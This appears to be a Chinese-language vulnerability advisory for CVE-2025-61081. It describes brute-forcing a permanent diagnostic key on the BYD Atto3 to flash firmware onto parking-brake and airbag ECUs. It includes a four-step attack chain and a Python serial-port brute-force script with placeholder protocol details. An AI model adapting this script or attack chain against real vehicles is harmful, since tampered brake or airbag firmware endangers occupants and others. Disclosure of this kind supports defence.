CVE-2025-61081 CVSS 7.5 高危

CVE-2025-61081: BYD Atto3 认证密钥暴力破解漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-61081

漏洞类型

暴力破解

CVSS评分

7.5 高危

攻击向量

物理 (AV:P)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

BYD Atto3

漏洞概述

CVE-2025-61081 是影响 BYD Atto3 车型的高危安全漏洞。攻击者可通过物理接触车辆，利用暴力破解攻击获取永久有效的认证密钥。该密钥允许攻击者向电子驻车制动（EPB）和辅助约束系统（SRS）相关的 ECU 刷写固件，严重威胁车辆行驶安全及系统完整性。

技术细节

该漏洞源于 BYD Atto3 车辆诊断接口（如 OBD-II）缺乏有效的防暴力破解机制。攻击者需物理接入车辆内部通信总线，通过自动化脚本大量尝试发送不同组合的认证密钥。由于系统未对连续失败的认证尝试实施账户锁定或延迟策略，攻击者可在可接受的时间内穷举出正确的密钥。该密钥具有长期有效性，一旦获取，攻击者即可利用该特权身份向电子驻车制动（EPB）和辅助约束系统（SRS）的 ECU 发送固件更新指令，植入篡改后的固件，可能导致刹车失效或安全气囊故障，对人身安全构成严重威胁。

攻击链分析

STEP 1

物理接触

攻击者物理接触车辆，接入车载诊断接口（OBD-II）或直接连接至相关ECU总线。

STEP 2

协议分析

分析车辆通信协议，定位认证密钥验证的数据包格式及响应机制。

STEP 3

暴力破解

利用脚本发送大量密钥尝试，由于缺乏防御机制，最终通过穷举获取永久有效的认证密钥。

STEP 4

固件刷写

使用获取的密钥通过验证，向电子驻车制动（EPB）和辅助约束系统（SRS）ECU刷写恶意或篡改的固件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2025-61081: Brute Force Auth Key on BYD Atto3
# This script simulates the brute force process against the ECU interface.

import serial
import time

def brute_force_ecu(port='/dev/ttyUSB0', baud_rate=115200):
    """
    Attempts to brute force the authentication key.
    Note: Actual protocol implementation may vary.
    """
    try:
        # Connect to the vehicle's diagnostic interface
        ser = serial.Serial(port, baud_rate, timeout=1)
        print(f"[+] Connected to {port} at {baud_rate} baud.")
        
        # Simulating key space (e.g., 16-bit or 32-bit integer range)
        # In a real scenario, this depends on the specific key format.
        for key in range(0, 100000):
            # Construct the authentication request packet
            # Format example: "AUTH_KEY <value>"
            payload = f"AUTH_KEY {key}\n".encode('utf-8')
            
            ser.write(payload)
            response = ser.readline().decode('utf-8').strip()
            
            # Check for successful authentication response
            if "ACCESS_GRANTED" in response or "OK" in response:
                print(f"[!] SUCCESS: Valid Key Found -> {key}")
                print(f"[!] Flash access enabled for EPB and SRS ECUs.")
                return key
            
            # Simple progress indicator
            if key % 1000 == 0:
                print(f"[*] Testing key: {key}")
                # Optional: Small delay to prevent bus flooding
                time.sleep(0.01)
                
    except serial.SerialException as e:
        print(f"[-] Serial Error: {e}")
    except KeyboardInterrupt:
        print("\n[-] Attack stopped by user.")
    finally:
        if 'ser' in locals() and ser.is_open:
            ser.close()
            print("[+] Connection closed.")

if __name__ == "__main__":
    print("Starting CVE-2025-61081 PoC...")
    brute_force_ecu()

影响范围

BYD Atto3

防御指南

临时缓解措施

建议车主将车辆停放在安全区域，防止未经授权的物理接触。尽快联系官方经销商或关注厂商公告，获取并安装安全补件以修复该认证绕过漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表